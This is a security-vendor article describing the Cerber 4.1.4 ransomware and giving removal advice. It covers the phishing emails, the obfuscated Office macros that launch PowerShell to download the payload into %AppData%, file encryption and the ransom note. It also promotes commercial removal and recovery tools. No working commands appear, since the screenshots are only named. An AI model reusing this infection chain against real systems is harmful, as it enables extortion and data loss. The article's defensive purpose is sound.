Hey you,
BE IN THE KNOW!

35,000 ransomware infections per month and you still believe you are protected?

Sign up to receive:

  • alerts
  • news
  • free how-to-remove guides

of the newest online threats - directly to your inbox:


Cerber 4.1.4 Virus Remove It and Try Decrypting Encrypted Files

cerber-ransomware-4-1-4-remove-and-decrypt-your-filesOne of the most impactful ransomware viruses – Cerber has released yet another iteration of its fourth variant. The virus has applied changes in how it communicates with the C&C servers and some slight changes in the methods it infects, switching to malicious macros to conduct an infection. Regarding encryption, not much has changed and Cerber still alters the names of the encrypted files and adds a random 4 A-Z, 0-9 file extension. Anyone who has been infected by this iteration of Cerber ransomware should immediately focus on removing it from their computer instead of paying the ransom. If you are looking for alternative methods to remove Cerber by yourself and try to restore the encrypted files, we suggest you read the following article thoroughly.

Threat Summary

NameCerber 4.1.4
TypeRansomware Virus
Short DescriptionThis Cerber ransomware variant 4.1.4 encrypts files with the RSA or AES ciphers adding four randomly generated A-Z 0-9 characters(ex. .z33f) as a file extension to the encrypted files and asks a ransom payoff for decryption.
SymptomsFiles are enciphered and become inaccessible by any type of software. Several ransom notes with instructions for paying the ransom shows as a “Readme.hta” files.
Distribution MethodVia malicious macros on Microsoft Office or Adobe Reader.
Detection Tool See If Your System Has Been Affected by Cerber 4.1.4

Download

Malware Removal Tool

Data Recovery ToolData Recovery Pro by ParetoLogic Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.
User ExperienceJoin our forum to Discuss Cerber Ransomware.

Cerber 4.1.4 – In-Depth Information

In order to make you better understand how Cerber ransomware version 4.1.4 operates, we will take you through the threat methodologically from the distribution to the final ransom payment URL.

Cerber 4.1.4’s Distribution and Infection

To cause a successful infection, the creators of Cerber 4.1.4 ransomware have most likely used the assistance of a software, known in the research field as file joiner, which combines malicious files with legitimate documents. This tool may have allowed the coders to create an obfuscated macro infection that is activated only when you enable macros on a Microsoft Office document to edit it shortly after opening it:

microsoft-office-enable-macros-sensorstechforum

The procedure for spreading this malware is rather the same as most procedures. Phishing e-mails may be used to spam the user, tricking him into opening malicious documents. The documents distributing Cerber 4.1.4 are primarily in a .doc file format and they have random digit names, like the following:

document-malicious-macro-cerber-4-1-4-sensorstechforum

Such document is uploaded alongside a fraudulent spam-message that aims to convince the user with false messages, claiming the document is important, for example:

spam-e-mail-cerber-ransowmare-4-1

After opening the malicious macro, the infection may execute it in an obfuscated manner, which brings us to another tool, used by the coders of Cerber 4.1.4, malware obfuscators, that avoid detection by most conventional and widely used Anti-Virus programs.

Related Article: Obfuscation in Malware – The Key to A Successful infection

The malicious macros open the Power Shell as an administrator in Windows only to quietly execute command similar to the following:

cerber-ransomware-4-1-4-sensorstechforum-power-shell-command-malicious-macros

Then, the malware also makes sure to download the real payload of Cerber 4.1.4 ransomware by connecting to a remote server via anther Power Shell, command, similar to the following, reported by Bleeping Computer researchers:

power-shell-command-second-malicious-macro-sensorstechforum

As visible, Cerber ransomware’s payload is being downloaded as a file, named winx64.exe, located in the %AppData% folder.

As soon as the malicious file is downloaded, the malware automatically starts the file, so that it begins to encrypt the files of the victim.

Cerber 4.1.4 – Post-Infection Analysis

By default, Cerber ransomware has not change it’s already strong and so far unbeatable encryption. It still uses an immensely strong combination of RSA and AES encryption algorithm to scramble files of the following types:

  • Microsoft Office documents.
  • Adobe Reader files.
  • Adobe Photoshop and other Adobe software files.
  • Pictures.
  • Videos.
  • Audio files.
  • Databases.
  • Virtual machines.

After the encryption, the enciphered files still assume the very same form:cerber-ransomware-file-encrypted-sensorsrtechforum

  • No longer openable.
  • Changed names.
  • Changed file extension.

Cerber also drops it’s distinctive “Readme.hta” ransom note file which once more leads to the standard Cerber payment web page:

cerber-payment-page-sensorstechforum-768x423

After this has been completed, the ransomware may either heavily modify the registry entries to run the malicious executable located in the %AppData% folder to run every-time Windows starts and encrypt newly added files or files in remote drives, such as USB sticks and others.

How to Remove Cerber 4.1.4 Virus and Try To Get Back Encrypted Files

Basically Cerber 4.1.4 is yet another variant of the so-far many Cerber variants which we have detected out in the wild. The malware is very sophisticated in what it does and researchers are yet to discover any bugs in it’s code, allowing them to crack the virus, as they did with the first variant of Cerber.

In case you are looking for methods to restore your files if they have been encoded by this nasty threat, advices are to immediately act and remove it safely, using the instructions below. You can try and remove it manually, but we strongly recommend using a professional malware removal tool to do the job for you swiftly and safely.

After removing Cerber, we have offered several alternative suggestions that may help you try to recover your non-openable files. We are constantly researching for newer and newer data recovery methods that will help you recover your files. Since sophisticated malware like Cerber deletes the files with several passes, it is very difficult to scrape up a solution that is 100% effective. Still, we will keep researching and fighting the fight against this nasty threat and update this article with more information if a decryptor is released, so we advise following our blog regularly.

Manually delete Cerber 4.1.4 from your computer

Note! Substantial notification about the Cerber 4.1.4 threat: Manual removal of Cerber 4.1.4 requires interference with system files and registries. Thus, it can cause damage to your PC. Even if your computer skills are not at a professional level, don’t worry. You can do the removal yourself just in 5 minutes, using a malware removal tool.

1. Boot Your PC In Safe Mode to isolate and remove Cerber 4.1.4 files and objects
2.Find malicious files created by Cerber 4.1.4 on your PC

Automatically remove Cerber 4.1.4 by downloading an advanced anti-malware program

1. Remove Cerber 4.1.4 with SpyHunter Anti-Malware Tool and back up your data

Try to Recover Files Encrypted by Cerber 4.1.4 on your computer

Restore files encrypted by Cerber 4.1.4

Vencislav Krustev

A network administrator and malware researcher at SensorsTechForum with passion for discovery of new shifts and innovations in cyber security. Strong believer in basic education of every user towards online safety.

More Posts - Website

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...
Please wait...

Subscribe to our newsletter

Want to be notified when our article is published? Enter your email address and name below to be the first to know.